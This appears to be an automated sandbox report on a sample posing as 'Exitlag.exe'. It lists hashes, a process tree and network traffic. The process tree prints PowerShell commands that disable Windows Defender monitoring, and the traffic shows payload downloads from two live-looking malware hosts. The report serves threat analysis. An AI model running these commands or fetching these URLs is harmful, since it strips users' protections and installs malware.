Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    06-01-2025 07:11

General

  • Target

    Exitlag/Exitlag.exe

  • Size

    71.1MB

  • MD5

    50c9ab0b2423ac229c46cc00fe90bc3c

  • SHA1

    e0bee49bc0120aa8f84b65a26cb2d25e943e5b79

  • SHA256

    b4ddfe40ced34d89fc71db575c2a68c17c79551338411f012a2f28764c09a870

  • SHA512

    de0c0c2bb751c7fddbf8c5502dbc6b88414754b839f66fa7930c8e6788b69e2394b4040b0dfcad4b3add97dee9094b2f97fa2b1b5dd11165eb59bfe6714ac4f9

  • SSDEEP

    3072:Dc69mBoayt0cg6rlagjm2lXImnS7meRtZUBRPhutDFdM3fkdJ41:D/m2a7cxx59nxGtZykDFdIB

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Exitlag\Exitlag.exe
    "C:\Users\Admin\AppData\Local\Temp\Exitlag\Exitlag.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ExecutionPolicy Bypass -Command "Set-MpPreference -UILockdown $true"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:356
    • C:\Users\Admin\AppData\Local\Temp\butty.exe
      "C:\Users\Admin\AppData\Local\Temp\butty.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2964
      • C:\Users\Admin\AppData\Local\Temp\butty.exe
        "C:\Users\Admin\AppData\Local\Temp\butty.exe"
        3⤵
        • Executes dropped EXE
        PID:2724

Network

  • flag-us
    DNS
    moondarklight.me
    Exitlag.exe
    Remote address:
    8.8.8.8:53
    Request
    moondarklight.me
    IN A
    Response
    moondarklight.me
    IN A
    104.21.40.53
    moondarklight.me
    IN A
    172.67.176.118
  • flag-us
    GET
    https://moondarklight.me/oops.exe
    Exitlag.exe
    Remote address:
    104.21.40.53:443
    Request
    GET /oops.exe HTTP/1.1
    Host: moondarklight.me
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Mon, 06 Jan 2025 07:11:21 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=14400
    CF-Cache-Status: STALE
    Age: 29412
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ze9glAbFMHdmDh1plSDzb7tlp8XGvJhn8d4rUU5a%2FY83fjxh7qJ4yV%2B3GUfdWW4gY7sJ%2BotdlyKGghV4z7vwKskO026VHGbNnO98Wpl5dRenWT%2FwGStj6B2W50ysMYmZZDwV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd9e4bd8e2b651f-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=63909&min_rtt=59947&rtt_var=19282&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=355&delivery_rate=57304&cwnd=253&unsent_bytes=0&cid=7beccaed76cab983&ts=186&x=0"
  • flag-us
    DNS
    bellingthesun.com
    Exitlag.exe
    Remote address:
    8.8.8.8:53
    Request
    bellingthesun.com
    IN A
    Response
    bellingthesun.com
    IN A
    172.67.142.117
    bellingthesun.com
    IN A
    104.21.95.4
  • flag-us
    GET
    https://bellingthesun.com/haskitime/butty.exe
    Exitlag.exe
    Remote address:
    172.67.142.117:443
    Request
    GET /haskitime/butty.exe HTTP/1.1
    Host: bellingthesun.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 07:11:21 GMT
    Content-Type: application/octet-stream
    Content-Length: 3276800
    Connection: keep-alive
    Last-Modified: Wed, 25 Dec 2024 16:48:54 GMT
    ETag: "676c3776-320000"
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 991
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BlJ%2BwmOtVuvQNFO99fB8vEH5%2BMC9ENq7%2F701R4s9IZwZiUpq6cD0ubCxSykM%2BuJW%2FDNJvW9PFV%2BgJnK7a92IfqSVhIG96jjdnvq7kck2fidlzFmx6HLmi56EBq%2BHRQA0%2Fru7BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd9e4bfca7aedf2-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=60568&min_rtt=59347&rtt_var=14653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=372&delivery_rate=63382&cwnd=253&unsent_bytes=0&cid=b9d0d0bd8e740aa3&ts=143&x=0"
  • 104.21.40.53:443
    https://moondarklight.me/oops.exe
    tls, http
    Exitlag.exe
    757 B
    4.3kB
    9
    9

    HTTP Request

    GET https://moondarklight.me/oops.exe

    HTTP Response

    404
  • 172.67.142.117:443
    https://bellingthesun.com/haskitime/butty.exe
    tls, http
    Exitlag.exe
    86.0kB
    3.4MB
    1704
    2448

    HTTP Request

    GET https://bellingthesun.com/haskitime/butty.exe

    HTTP Response

    200
  • 8.8.8.8:53
    moondarklight.me
    dns
    Exitlag.exe
    62 B
    94 B
    1
    1

    DNS Request

    moondarklight.me

    DNS Response

    104.21.40.53
    172.67.176.118

  • 8.8.8.8:53
    bellingthesun.com
    dns
    Exitlag.exe
    63 B
    95 B
    1
    1

    DNS Request

    bellingthesun.com

    DNS Response

    172.67.142.117
    104.21.95.4

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YRO1RRF07MK0XF749642.temp

    Filesize

    7KB

    MD5

    55e88676417c13a7e183aee45a993a31

    SHA1

    3a01dea4eeaef4bda242da6bd5c26e555fd0e6fd

    SHA256

    fe1ccfcc20b52014494bc031b4ce38a0078a18b813c442a2c52882e8937eae60

    SHA512

    e0829a444e9c35a8afc9261c95bd2cee7a9245ae0e1d5d21b80720c3a305b26252a21b99e9def079bbe2f2045a576e398a3eaad5fdad960d385c47d9555b1731

  • \Users\Admin\AppData\Local\Temp\butty.exe

    Filesize

    3.1MB

    MD5

    3c3a898442526b47ad166a3774263e3e

    SHA1

    3e468fdc7ca16461f934559391d70b7296693d97

    SHA256

    5be48844ce2ddefeac5d05580d420cb64990e82e89504b930cfb30962a5ce441

    SHA512

    22ccaed307c4a2ab16ab3eb1dc00deff233f3d734730193d65c2a52bb208da8ab68c98e4605b3846c28fcc6b0106e5e2e31c52161d073e6eae75cd955beb89fd

  • memory/356-22-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

  • memory/356-21-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/1032-9-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

  • memory/1032-15-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-10-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-11-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-14-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-13-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-12-0x000007FEEDA10000-0x000007FEEE3AD000-memory.dmp

    Filesize

    9.6MB

  • memory/1032-7-0x000007FEEDCCE000-0x000007FEEDCCF000-memory.dmp

    Filesize

    4KB

  • memory/1032-8-0x000000001B480000-0x000000001B762000-memory.dmp

    Filesize

    2.9MB

  • memory/1600-0-0x000007FEF5AB3000-0x000007FEF5AB4000-memory.dmp

    Filesize

    4KB

  • memory/1600-2-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

  • memory/1600-1-0x0000000000870000-0x0000000004F9A000-memory.dmp

    Filesize

    71.2MB

  • memory/1600-28-0x000007FEF5AB3000-0x000007FEF5AB4000-memory.dmp

    Filesize

    4KB

  • memory/1600-33-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

  • memory/1600-34-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

  • memory/2724-31-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

    Filesize

    4KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.